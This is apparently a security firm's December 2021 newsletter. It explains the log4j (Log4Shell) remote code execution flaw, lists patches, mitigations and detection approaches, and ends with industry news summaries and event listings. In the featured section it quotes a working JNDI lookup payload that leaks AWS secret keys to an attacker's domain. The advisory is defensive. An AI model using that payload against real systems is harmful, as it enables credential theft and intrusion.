Issue 36 | December 2021 | view in browser

Happy holidays - IOActive Newsletter - security research, news and events

Greetings,

Season's greetings from IOActive!
The best wishes for the holidays and the new year from the IOActive team - we look forward to sharing more news from IOActive in the new year!

IOActive provides research-fueled security services—supporting our customers' critical efforts in strengthening their operational and security resiliency. Our monthly newsletter features updates on our latest security research, thoughtfully-curated security industry news, and our latest event engagements - we hope you find the information both useful and relevant.

IOActive newsletter - featured

The log4j (Log4Shell) Situation 

What happened:
A 0-day exploit was released for log4j—a Java-based logging utility that's part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs. 

Impact:
People are comparing this to Heartbleed, but it's much worse in a number of ways. While Heartbleed affected all TLS implementations, and this one only affects systems that use log4j, this issue produces direct and immediate harm in the form of password/key extractions and shells.

How it works:
The vulnerability is due to insecure the “lookup" functionality within log4j that executes user-provided content as code, also known as RCE. So if you provide the input `${env:PWD}`, it'll write the PWD environment variable to the log. It gets much worse from there, including the egressing of data out of the affected system and—most importantly—spawning a shell on the affected system.

Example: Here's an example from @dildog of extracting AWS Keys and listening for incoming requests.
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

Thoughts on what to do:
The best way to fix this is to find all instances of log4j and patch them to 2.15+. If not, there are a few possible mitigations:

Patching: Upgrade to version 2.15.0.

Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Note: WAF can help but won't solve the problem. Most companies' backend systems are already clogged with these malicious payloads, from multiple ingress points. We can't fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.

Detection: Many companies using Semgrep to find vulnerable inclusions of user-provided data. Here's an example Semgrep rule from Clint Gibler of R2C/TLDRSec. 

Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it's using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. | Code via Cybereason

Other Considerations: As David Litchfield, IOActive Business Development Director, pointed out in a number of tweets, this isn't just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., are all additional attack vectors. Also consider second and N-level order processing of content on the backend as part of batch processes and other types of automation.

Perspective from Security Research:
What is remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn't just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:

  1. The project is maintained by very few people in their spare time for no money, and;
  2. If the project had a major issue it would disrupt the entire internet.

We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they're creating from a security standpoint. This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

Related reading:
Hackers start pushing malware in worldwide Log4Shell attacks | Dec 12
Researchers trigger new exploit by renaming an iPhone and a Tesla | Dec 13
Log4j vulnerability now used by state-backed hackers, access brokers | Dec 15
Microsoft Spots Multiple Nation-State APTs Exploiting Log4j Flaw | Dec 15

IOActive newsletter - security/industry news

CISA's KNOWN EXPLOITED VULNERABILITIES CATALOG | Dec 2021 | CISA.gov
CISA has added over 15 new vulnerabilities to their Known Exploited Vulnerabilities Catalog in December alone. The list has grown to over 300 to include: Qualcomm Chips, MikroTik Routers, Zoho (2), Apache, Adobe, Android... others. > read more

2021 CWE Most Important Hardware Weaknesses | Dec 2012 | cwe.mitre.org
MITRE and CISA announced the 2021 CWE Most Important Hardware Weaknesses List. Top hits were: Improper isolation of shared resources on a SOC, improper access control for on-chip debug and test interfaces, and improper prevention of of Lock Bit modification. > read more

Common Cloud Misconfigurations Exploited in Minutes, Report | Nov 23 | ThreatPost
PAN's Unit 42 used a honeypot of 320 systems to detect attacks against internet-facing misconfigurations in daemons like SSH, RDP, and Postgres - 80% of the systems were compromised within a week, and some were hit within minutes. > read more

Attackers don’t bother brute-forcing long passwords, Microsoft engineer says | Nov 22 | TheRecord.media
Ross Bevington, a security researcher at Microsoft, says he looked at 25 million SSH brute force attacks across Microft's sensor network and found that 77% of attempts were between 1 and 7 characters. Guesses over 10 characters were only seen in 6% of cases. > read more

How to Improve Red Team Effectiveness using Obfuscation | Nov 18 | securityweek
A new analysis of website fingerprinting (WF) attacks aimed at the Tor web browser has revealed that it's possible for an adversary to glean a website frequented by a victim, but only in scenarios where the threat actor is interested in a specific subset of the websites visited by users. > read more

Researchers Demonstrate New Fingerprinting Attack on Tor Encrypted Traffic | Nov 15 | The Hacker News
A new analysis of website fingerprinting (WF) attacks aimed at the Tor web browser has revealed that it's possible for an adversary to glean a website frequented by a victim, but only in scenarios where the threat actor is interested in a specific subset of the websites visited by users. > read more

Millions of Routers, IoT Devices at Risk from BotenaGo Malware | Nov 12 | Threatpost
A new open source malware written in Go called BotenaGo can exploit more than 30 different vulnerablities in routers and IoT devices.> read more

Palo Alto Networks patches 9.8 severity CVE in popular GlobalProtect product | Nov 11 | Bleeping Computer
CVSS 9.8-rated buffer overflow affecting a VPN component of its widely used firewall software, warning that the flaw allows unauthenticated attackers to execute arbitrary code on unpatched appliances. > read more

Researchers Release PoC Tool Targeting BrakTooth Bluetooth Vulnerabilities | Nov 05 | securityweek
Researchers Release PoC Tool Targeting BrakTooth Bluetooth Vulnerabilities. > read more

The Booming Underground Market for Bots That Steal Your 2FA Codes | Nov 02 | vice.com
Attackers are using voice bots to automate 2FA token extraction. The bot calls the victim and at the same time a code is sent to the victim's phone. If the victim gives the bot the code, the hacker is in. > read more

Microsoft: Russian SVR hacked at least 14 IT supply chain firms since May | Oct 25 | Bleeping Computer
Microsoft says the Russian-backed Nobelium threat group behind last year's SolarWinds hack is still targeting the global IT supply chain, with 140 managed service providers (MSPs) and cloud service providers attacked and at least 14 breached since May 2021. > read more

Credit card PINs can be guessed even when covering the ATM pad | Oct 18 | Bleeping Computer
Researchers have proven it’s possible to train a special-purpose deep-learning algorithm that can guess 4-digit card PINs 41% of the time, even if the victim is covering the pad with their hands. > read more

IOActive newsletter - upcoming events

RSAC Webcast Series | Jan 18, 2022 | 1:00pm ET
John Sawyer, IOActive Director of Services, will be presenting 'Pen-testing the Supply Chain' webcast. John will focus on exploring how to identify risks in your software supply chain through enhanced security testing and adversary simulation. register to join the webcast

IOActive archived webinars are always available on demand!
Catch up with our most popular past research/security presentations focusing on topics as: Bluetooth Low Energy testing; Hacking smart cities and LoRaWAN networks; supply chain security; appsec - mobile trading apps; red/purple team services. > IOActive webinar archives

More IOActive Engagements | TBD

We're always looking for events to engage with our community, more events are in the works! Additional detail to follow in the next newsletter or follow us on social or visit IOActive.com.

Visit ioactive.com and follow us on social to get the latest updates on IOActive research, security services, and events.

contact us  |  update preferences / unsubscribe  |  privacy policy

©2021 IOActive Inc. All Rights Reserved.
1426 Elliott Avenue W, Seattle, Washington 98119, USA